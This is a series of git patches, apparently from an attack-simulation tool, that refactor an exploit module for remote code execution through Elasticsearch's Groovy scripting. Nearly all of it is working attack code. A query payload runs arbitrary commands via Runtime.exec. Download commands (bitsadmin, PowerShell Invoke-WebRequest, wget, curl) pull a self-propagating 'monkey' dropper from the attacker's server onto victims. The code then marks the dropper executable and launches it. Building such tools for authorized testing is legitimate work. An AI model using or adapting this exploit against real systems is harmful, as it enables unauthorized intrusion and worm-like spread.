From 8ddfb03f270884f6015ba1a2492065f625c20b73 Mon Sep 17 00:00:00 2001 From: Vakaris Date: Fri, 20 Jul 2018 18:15:15 +0300 Subject: [PATCH 01/10] Uploaded and modified standard web_rce code usage.Not working, not tested --- infection_monkey/exploit/elasticgroovy.py | 72 +++++++++++-------- infection_monkey/network/mssql_fingerprint.py | 3 +- 2 files changed, 44 insertions(+), 31 deletions(-) diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py index 989ae5cdf..d056afb05 100644 --- a/infection_monkey/exploit/elasticgroovy.py +++ b/infection_monkey/exploit/elasticgroovy.py @@ -9,17 +9,17 @@ import logging import requests -from exploit import HostExploiter from model import DROPPER_ARG from network.elasticfinger import ES_SERVICE, ES_PORT from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth +from exploit.web_rce import WebRCE __author__ = 'danielg' LOG = logging.getLogger(__name__) -class ElasticGroovyExploiter(HostExploiter): +class ElasticGroovyExploiter(WebRCE): # attack URLs BASE_URL = 'http://%s:%s/_search?pretty' MONKEY_RESULT_FIELD = "monkey_result" @@ -38,40 +38,52 @@ class ElasticGroovyExploiter(HostExploiter): def __init__(self, host): super(ElasticGroovyExploiter, self).__init__(host) - self._config = __import__('config').WormConfiguration - self.skip_exist = self._config.skip_exploit_if_file_exist - - def is_os_supported(self): - """ - Checks if the host is vulnerable. - Either using version string or by trying to attack - :return: - """ - if not super(ElasticGroovyExploiter, self).is_os_supported(): - return False + def exploit_host(self): + # self.exploit_host_linux() if ES_SERVICE not in self.host.services: LOG.info("Host: %s doesn't have ES open" % self.host.ip_addr) return False - major, minor, build = self.host.services[ES_SERVICE]['version'].split('.') - major = int(major) - minor = int(minor) - build = int(build) - if major > 1: + # We need a reference to the exploiter for WebRCE framework to use + exploiter = self.exploit + # Build url from host and elastic port(not https) + urls = WebRCE.build_potential_urls(self.host, [[ES_PORT, False]], ['_search?pretty']) + vulnerable_urls = [] + for url in urls: + if WebRCE.check_if_exploitable(exploiter, url): + vulnerable_urls.append(url) + self._exploit_info['vulnerable_urls'] = vulnerable_urls + if not vulnerable_urls: return False - if major == 1 and minor > 4: - return False - if major == 1 and minor == 4 and build > 2: - return False - return self.is_vulnerable() - def exploit_host(self): - real_host_os = self.get_host_os() - self.host.os['type'] = str(real_host_os.lower()) # strip unicode characters - if 'linux' in self.host.os['type']: - return self.exploit_host_linux() - else: - return self.exploit_host_windows() + if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], self._config): + LOG.info("Host %s was already infected under the current configuration, done" % self.host) + return True + + if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]): + return False + + data = WebRCE.upload_monkey(self.host, self._config, exploiter, vulnerable_urls[0]) + + # We can't use 'if not' because response may be '' + if data is not False and data['response'] == False: + return False + + if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False: + return False + + if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], True) == False: + return False + + return True + + def exploit(self, url, command): + payload = self.JAVA_CMD % command + response = requests.get(url, data=payload) + result = self.get_results(response) + if not result: # not vulnerable + return False + return result[0] def exploit_host_windows(self): """ diff --git a/infection_monkey/network/mssql_fingerprint.py b/infection_monkey/network/mssql_fingerprint.py index 9409c2255..ea4370d24 100644 --- a/infection_monkey/network/mssql_fingerprint.py +++ b/infection_monkey/network/mssql_fingerprint.py @@ -29,7 +29,8 @@ class MSSQLFinger(HostFinger): Discovered server information written to the Host info struct. True if success, False otherwise. """ - + # TODO remove auto-return + return False assert isinstance(host, VictimHost) # Create a UDP socket and sets a timeout From 7e2cc86ab95c2d22440822ff85321dad1973c7fa Mon Sep 17 00:00:00 2001 From: Vakaris Date: Mon, 23 Jul 2018 12:04:18 +0300 Subject: [PATCH 02/10] Code cleaned and tested on ubuntu --- infection_monkey/exploit/elasticgroovy.py | 153 ---------------------- 1 file changed, 153 deletions(-) diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py index d056afb05..668a95ce3 100644 --- a/infection_monkey/exploit/elasticgroovy.py +++ b/infection_monkey/exploit/elasticgroovy.py @@ -85,159 +85,6 @@ class ElasticGroovyExploiter(WebRCE): return False return result[0] - def exploit_host_windows(self): - """ - TODO - Will exploit windows similar to smbexec - :return: - """ - return False - - def exploit_host_linux(self): - """ - Exploits linux using similar flow to sshexec and shellshock. - Meaning run remote commands to copy files over HTTP - :return: - """ - uname_machine = str(self.get_linux_arch()) - if len(uname_machine) != 0: - self.host.os['machine'] = str(uname_machine.lower().strip()) # strip unicode characters - dropper_target_path_linux = self._config.dropper_target_path_linux - if self.skip_exist and (self.check_if_remote_file_exists_linux(dropper_target_path_linux)): - LOG.info("Host %s was already infected under the current configuration, done" % self.host) - return True # return already infected - src_path = get_target_monkey(self.host) - if not src_path: - LOG.info("Can't find suitable monkey executable for host %r", self.host) - return False - - if not self.download_file_in_linux(src_path, target_path=dropper_target_path_linux): - return False - - self.set_file_executable_linux(dropper_target_path_linux) - self.run_monkey_linux(dropper_target_path_linux) - - if not (self.check_if_remote_file_exists_linux(self._config.monkey_log_path_linux)): - LOG.info("Log file does not exist, monkey might not have run") - - return True - - def run_monkey_linux(self, dropper_target_path_linux): - """ - Runs the monkey - """ - - cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG) - cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1, location=dropper_target_path_linux) - cmdline += ' & ' - self.run_shell_command(cmdline) - LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", - self._config.dropper_target_path_linux, self.host, cmdline) - if not (self.check_if_remote_file_exists_linux(self._config.dropper_log_path_linux)): - LOG.info("Log file does not exist, monkey might not have run") - - def download_file_in_linux(self, src_path, target_path): - """ - Downloads a file in target machine using curl to the given target path - :param src_path: File path relative to the monkey - :param target_path: Target path in linux victim - :return: T/F - """ - http_path, http_thread = HTTPTools.create_transfer(self.host, src_path) - if not http_path: - LOG.debug("Exploiter %s failed, http transfer creation failed." % self.__name__) - return False - download_command = '/usr/bin/curl %s -o %s' % ( - http_path, target_path) - self.run_shell_command(download_command) - http_thread.join(self.DOWNLOAD_TIMEOUT) - http_thread.stop() - if (http_thread.downloads != 1) or ( - 'ELF' not in - self.check_if_remote_file_exists_linux(target_path)): - LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__) - return False - return True - - def set_file_executable_linux(self, file_path): - """ - Marks the given file as executable using chmod - :return: Nothing - """ - chmod = '/bin/chmod +x %s' % file_path - self.run_shell_command(chmod) - LOG.info("Marked file %s on host %s as executable", file_path, self.host) - - def check_if_remote_file_exists_linux(self, file_path): - """ - :return: - """ - cmdline = '/usr/bin/head -c 4 %s' % file_path - return self.run_shell_command(cmdline) - - def run_shell_command(self, command): - """ - Runs a single shell command and returns the result. - """ - payload = self.JAVA_CMD % command - result = self.get_command_result(payload) - LOG.info("Ran the command %s on host %s", command, self.host) - return result - - def get_linux_arch(self): - """ - Returns host as per uname -m - """ - return self.get_command_result(self.JAVA_GET_BIT_LINUX) - - def get_host_tempdir(self): - """ - Returns where to write our file given our permissions - :return: Temp directory path in target host - """ - return self.get_command_result(self.JAVA_GET_TMP_DIR) - - def get_host_os(self): - """ - :return: target OS - """ - return self.get_command_result(self.JAVA_GET_OS) - - def is_vulnerable(self): - """ - Checks if a given elasticsearch host is vulnerable to the groovy attack - :return: True/False - """ - result_text = self.get_command_result(self.JAVA_IS_VULNERABLE) - return 'java.lang.Runtime' in result_text - - def get_command_result(self, payload): - """ - Gets the result of an attack payload with a single return value. - :param payload: Payload that fits the GENERIC_QUERY template. - """ - result = self.attack_query(payload) - if not result: # not vulnerable - return "" - return result[0] - - def attack_query(self, payload): - """ - Wraps the requests query and the JSON parsing. - Just reduce opportunity for bugs - :return: List of data fields or None - """ - response = requests.get(self.attack_url(), data=payload) - result = self.get_results(response) - return result - - def attack_url(self): - """ - Composes the URL to attack per host IP and port. - :return: Elasticsearch vulnerable URL - """ - return self.BASE_URL % (self.host.ip_addr, ES_PORT) - def get_results(self, response): """ Extracts the result data from our attack From a54eedec113d914a458fc675e61052770dd8e5bf Mon Sep 17 00:00:00 2001 From: Vakaris Date: Tue, 24 Jul 2018 15:55:34 +0300 Subject: [PATCH 03/10] Commands tested and working on windows. --- infection_monkey/exploit/elasticgroovy.py | 25 +++++++++++++++++------ 1 file changed, 19 insertions(+), 6 deletions(-) diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py index 668a95ce3..51531957b 100644 --- a/infection_monkey/exploit/elasticgroovy.py +++ b/infection_monkey/exploit/elasticgroovy.py @@ -6,13 +6,14 @@ import json import logging - import requests - -from model import DROPPER_ARG from network.elasticfinger import ES_SERVICE, ES_PORT from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth from exploit.web_rce import WebRCE +from model import WGET_HTTP_UPLOAD, POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED + +import copy +import re __author__ = 'danielg' @@ -34,6 +35,10 @@ class ElasticGroovyExploiter(WebRCE): DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder + # Both commands are prepared for use in future development + RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s' + POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing\\\"" + _TARGET_OS_TYPE = ['linux', 'windows'] def __init__(self, host): @@ -56,14 +61,22 @@ class ElasticGroovyExploiter(WebRCE): if not vulnerable_urls: return False - if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], self._config): + # Extra escaping required: + config = copy.deepcopy(self._config) + config.dropper_target_path_win_32 = r"C:\\\\Windows\\\\monkey32.exe" + config.dropper_target_path_win_64 = r"C:\\\\Windows\\\\monkey64.exe" + + if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], config): LOG.info("Host %s was already infected under the current configuration, done" % self.host) return True if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]): return False - data = WebRCE.upload_monkey(self.host, self._config, exploiter, vulnerable_urls[0]) + commands = {'windows': self.RDP_CMDLINE_HTTP, + 'linux': WGET_HTTP_UPLOAD} + + data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0], commands) # We can't use 'if not' because response may be '' if data is not False and data['response'] == False: @@ -81,7 +94,7 @@ class ElasticGroovyExploiter(WebRCE): payload = self.JAVA_CMD % command response = requests.get(url, data=payload) result = self.get_results(response) - if not result: # not vulnerable + if not result: return False return result[0] From 76523e7379ce4652f77ecca478ba958c2aba5670 Mon Sep 17 00:00:00 2001 From: Vakaris Date: Sat, 18 Aug 2018 16:49:33 +0300 Subject: [PATCH 04/10] Refactored elastic for latest framework changes --- infection_monkey/exploit/elasticgroovy.py | 28 +++++++------------ infection_monkey/network/mssql_fingerprint.py | 2 -- 2 files changed, 10 insertions(+), 20 deletions(-) diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py index 51531957b..73fe359a5 100644 --- a/infection_monkey/exploit/elasticgroovy.py +++ b/infection_monkey/exploit/elasticgroovy.py @@ -8,11 +8,9 @@ import json import logging import requests from network.elasticfinger import ES_SERVICE, ES_PORT -from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth from exploit.web_rce import WebRCE -from model import WGET_HTTP_UPLOAD, POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED +from model import WGET_HTTP_UPLOAD -import copy import re __author__ = 'danielg' @@ -49,48 +47,42 @@ class ElasticGroovyExploiter(WebRCE): if ES_SERVICE not in self.host.services: LOG.info("Host: %s doesn't have ES open" % self.host.ip_addr) return False - # We need a reference to the exploiter for WebRCE framework to use - exploiter = self.exploit # Build url from host and elastic port(not https) - urls = WebRCE.build_potential_urls(self.host, [[ES_PORT, False]], ['_search?pretty']) + urls = self.build_potential_urls([[ES_PORT, False]], ['_search?pretty']) vulnerable_urls = [] for url in urls: - if WebRCE.check_if_exploitable(exploiter, url): + if self.check_if_exploitable(url): vulnerable_urls.append(url) self._exploit_info['vulnerable_urls'] = vulnerable_urls if not vulnerable_urls: return False - # Extra escaping required: - config = copy.deepcopy(self._config) - config.dropper_target_path_win_32 = r"C:\\\\Windows\\\\monkey32.exe" - config.dropper_target_path_win_64 = r"C:\\\\Windows\\\\monkey64.exe" - - if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], config): + if self.skip_exist and self.check_remote_files(vulnerable_urls[0]): LOG.info("Host %s was already infected under the current configuration, done" % self.host) return True - if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]): + if not self.set_host_arch(vulnerable_urls[0]): return False commands = {'windows': self.RDP_CMDLINE_HTTP, 'linux': WGET_HTTP_UPLOAD} - data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0], commands) + data = self.upload_monkey(vulnerable_urls[0], commands) # We can't use 'if not' because response may be '' - if data is not False and data['response'] == False: + if data is not False and data['response'] is False: return False - if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False: + if self.change_permissions(vulnerable_urls[0], data['path']) is False: return False - if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], True) == False: + if self.execute_remote_monkey(vulnerable_urls[0], data['path'], True) is False: return False return True def exploit(self, url, command): + command = re.sub(r"\\", r"\\\\\\\\", command) payload = self.JAVA_CMD % command response = requests.get(url, data=payload) result = self.get_results(response) diff --git a/infection_monkey/network/mssql_fingerprint.py b/infection_monkey/network/mssql_fingerprint.py index ea4370d24..f973f3d87 100644 --- a/infection_monkey/network/mssql_fingerprint.py +++ b/infection_monkey/network/mssql_fingerprint.py @@ -29,8 +29,6 @@ class MSSQLFinger(HostFinger): Discovered server information written to the Host info struct. True if success, False otherwise. """ - # TODO remove auto-return - return False assert isinstance(host, VictimHost) # Create a UDP socket and sets a timeout From 56b3190cb58eb4e0c01e18773e8feb6ca304c5a6 Mon Sep 17 00:00:00 2001 From: Vakaris Date: Fri, 24 Aug 2018 14:27:48 +0300 Subject: [PATCH 05/10] Refactored elastic according to latest web_rce framework changes. Tested on windows and linux --- infection_monkey/exploit/elasticgroovy.py | 58 +++++++---------------- 1 file changed, 16 insertions(+), 42 deletions(-) diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py index 73fe359a5..f83fdc3e7 100644 --- a/infection_monkey/exploit/elasticgroovy.py +++ b/infection_monkey/exploit/elasticgroovy.py @@ -7,13 +7,12 @@ import json import logging import requests -from network.elasticfinger import ES_SERVICE, ES_PORT from exploit.web_rce import WebRCE from model import WGET_HTTP_UPLOAD import re -__author__ = 'danielg' +__author__ = 'danielg, VakarisZ' LOG = logging.getLogger(__name__) @@ -31,55 +30,30 @@ class ElasticGroovyExploiter(WebRCE): % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()""" JAVA_GET_BIT_LINUX = JAVA_CMD % '/bin/uname -m' - DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder - # Both commands are prepared for use in future development RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s' - POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing\\\"" + POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s'" \ + r" -OutFile '%(monkey_path)s' -UseBasicParsing\\\"" _TARGET_OS_TYPE = ['linux', 'windows'] def __init__(self, host): super(ElasticGroovyExploiter, self).__init__(host) - def exploit_host(self): - # self.exploit_host_linux() - if ES_SERVICE not in self.host.services: - LOG.info("Host: %s doesn't have ES open" % self.host.ip_addr) - return False - # Build url from host and elastic port(not https) - urls = self.build_potential_urls([[ES_PORT, False]], ['_search?pretty']) - vulnerable_urls = [] - for url in urls: - if self.check_if_exploitable(url): - vulnerable_urls.append(url) - self._exploit_info['vulnerable_urls'] = vulnerable_urls - if not vulnerable_urls: - return False + def get_exploit_config(self): + exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config() + exploit_config['dropper'] = True + exploit_config['url_extensions'] = ['_search?pretty'] + exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': self.RDP_CMDLINE_HTTP} + return exploit_config - if self.skip_exist and self.check_remote_files(vulnerable_urls[0]): - LOG.info("Host %s was already infected under the current configuration, done" % self.host) - return True - - if not self.set_host_arch(vulnerable_urls[0]): - return False - - commands = {'windows': self.RDP_CMDLINE_HTTP, - 'linux': WGET_HTTP_UPLOAD} - - data = self.upload_monkey(vulnerable_urls[0], commands) - - # We can't use 'if not' because response may be '' - if data is not False and data['response'] is False: - return False - - if self.change_permissions(vulnerable_urls[0], data['path']) is False: - return False - - if self.execute_remote_monkey(vulnerable_urls[0], data['path'], True) is False: - return False - - return True + def get_open_service_ports(self, port_list, names): + # We must append elastic port we get from elastic fingerprint module because It's not marked as 'http' service + valid_ports = super(ElasticGroovyExploiter, self).get_open_service_ports(port_list, names) + elastic_service = [service for service in self.host.services if 'elastic-search' in service][0] + elastic_port = [elastic_service.lstrip('elastic-search-'), False] + valid_ports.append(elastic_port) + return valid_ports def exploit(self, url, command): command = re.sub(r"\\", r"\\\\\\\\", command) From d4262ef0bd0c3d2a6321560844af325c0472f48a Mon Sep 17 00:00:00 2001 From: Vakaris Date: Sat, 25 Aug 2018 18:13:44 +0300 Subject: [PATCH 06/10] Removed unused constants --- infection_monkey/exploit/elasticgroovy.py | 6 ------ 1 file changed, 6 deletions(-) diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py index f83fdc3e7..db07e00e1 100644 --- a/infection_monkey/exploit/elasticgroovy.py +++ b/infection_monkey/exploit/elasticgroovy.py @@ -19,16 +19,10 @@ LOG = logging.getLogger(__name__) class ElasticGroovyExploiter(WebRCE): # attack URLs - BASE_URL = 'http://%s:%s/_search?pretty' MONKEY_RESULT_FIELD = "monkey_result" GENERIC_QUERY = '''{"size":1, "script_fields":{"%s": {"script": "%%s"}}}''' % MONKEY_RESULT_FIELD - JAVA_IS_VULNERABLE = GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.Runtime\\")' - JAVA_GET_TMP_DIR = \ - GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.System\\").getProperty(\\"java.io.tmpdir\\")' - JAVA_GET_OS = GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.System\\").getProperty(\\"os.name\\")' JAVA_CMD = GENERIC_QUERY \ % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()""" - JAVA_GET_BIT_LINUX = JAVA_CMD % '/bin/uname -m' # Both commands are prepared for use in future development RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s' From 4d6472cce10e7c34fb743dc1720f208eb312b3d0 Mon Sep 17 00:00:00 2001 From: Vakaris Date: Wed, 29 Aug 2018 16:52:29 +0300 Subject: [PATCH 07/10] Ports are now taken from elastic_fingerprint module --- infection_monkey/exploit/elasticgroovy.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py index db07e00e1..74be84a79 100644 --- a/infection_monkey/exploit/elasticgroovy.py +++ b/infection_monkey/exploit/elasticgroovy.py @@ -9,6 +9,7 @@ import logging import requests from exploit.web_rce import WebRCE from model import WGET_HTTP_UPLOAD +from network.elasticfinger import ES_PORT, ES_SERVICE import re @@ -44,9 +45,8 @@ class ElasticGroovyExploiter(WebRCE): def get_open_service_ports(self, port_list, names): # We must append elastic port we get from elastic fingerprint module because It's not marked as 'http' service valid_ports = super(ElasticGroovyExploiter, self).get_open_service_ports(port_list, names) - elastic_service = [service for service in self.host.services if 'elastic-search' in service][0] - elastic_port = [elastic_service.lstrip('elastic-search-'), False] - valid_ports.append(elastic_port) + if ES_SERVICE in self.host.services: + valid_ports.append([ES_PORT, False]) return valid_ports def exploit(self, url, command): From 304f5bd64353a7702114ff2d8c474aab34d6ae1e Mon Sep 17 00:00:00 2001 From: Vakaris Date: Wed, 29 Aug 2018 17:14:55 +0300 Subject: [PATCH 08/10] Removed unused commands --- infection_monkey/exploit/elasticgroovy.py | 9 ++------- 1 file changed, 2 insertions(+), 7 deletions(-) diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py index 74be84a79..c4cc3e4a7 100644 --- a/infection_monkey/exploit/elasticgroovy.py +++ b/infection_monkey/exploit/elasticgroovy.py @@ -8,7 +8,7 @@ import json import logging import requests from exploit.web_rce import WebRCE -from model import WGET_HTTP_UPLOAD +from model import WGET_HTTP_UPLOAD, RDP_CMDLINE_HTTP from network.elasticfinger import ES_PORT, ES_SERVICE import re @@ -25,11 +25,6 @@ class ElasticGroovyExploiter(WebRCE): JAVA_CMD = GENERIC_QUERY \ % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()""" - # Both commands are prepared for use in future development - RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s' - POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s'" \ - r" -OutFile '%(monkey_path)s' -UseBasicParsing\\\"" - _TARGET_OS_TYPE = ['linux', 'windows'] def __init__(self, host): @@ -39,7 +34,7 @@ class ElasticGroovyExploiter(WebRCE): exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config() exploit_config['dropper'] = True exploit_config['url_extensions'] = ['_search?pretty'] - exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': self.RDP_CMDLINE_HTTP} + exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': RDP_CMDLINE_HTTP} return exploit_config def get_open_service_ports(self, port_list, names): From 477836e1c996e280c1f7b8c6ad9729ea6020e37b Mon Sep 17 00:00:00 2001 From: Vakaris Date: Wed, 29 Aug 2018 17:19:51 +0300 Subject: [PATCH 09/10] Blank newline added to match source file --- infection_monkey/network/mssql_fingerprint.py | 1 + 1 file changed, 1 insertion(+) diff --git a/infection_monkey/network/mssql_fingerprint.py b/infection_monkey/network/mssql_fingerprint.py index f973f3d87..d9361b033 100644 --- a/infection_monkey/network/mssql_fingerprint.py +++ b/infection_monkey/network/mssql_fingerprint.py @@ -29,6 +29,7 @@ class MSSQLFinger(HostFinger): Discovered server information written to the Host info struct. True if success, False otherwise. """ + assert isinstance(host, VictimHost) # Create a UDP socket and sets a timeout From a2bebca4bcbf94f6f682aac0156e05850256a80a Mon Sep 17 00:00:00 2001 From: Vakaris Date: Wed, 29 Aug 2018 17:20:43 +0300 Subject: [PATCH 10/10] spaces removed --- infection_monkey/network/mssql_fingerprint.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/infection_monkey/network/mssql_fingerprint.py b/infection_monkey/network/mssql_fingerprint.py index d9361b033..9409c2255 100644 --- a/infection_monkey/network/mssql_fingerprint.py +++ b/infection_monkey/network/mssql_fingerprint.py @@ -29,7 +29,7 @@ class MSSQLFinger(HostFinger): Discovered server information written to the Host info struct. True if success, False otherwise. """ - + assert isinstance(host, VictimHost) # Create a UDP socket and sets a timeout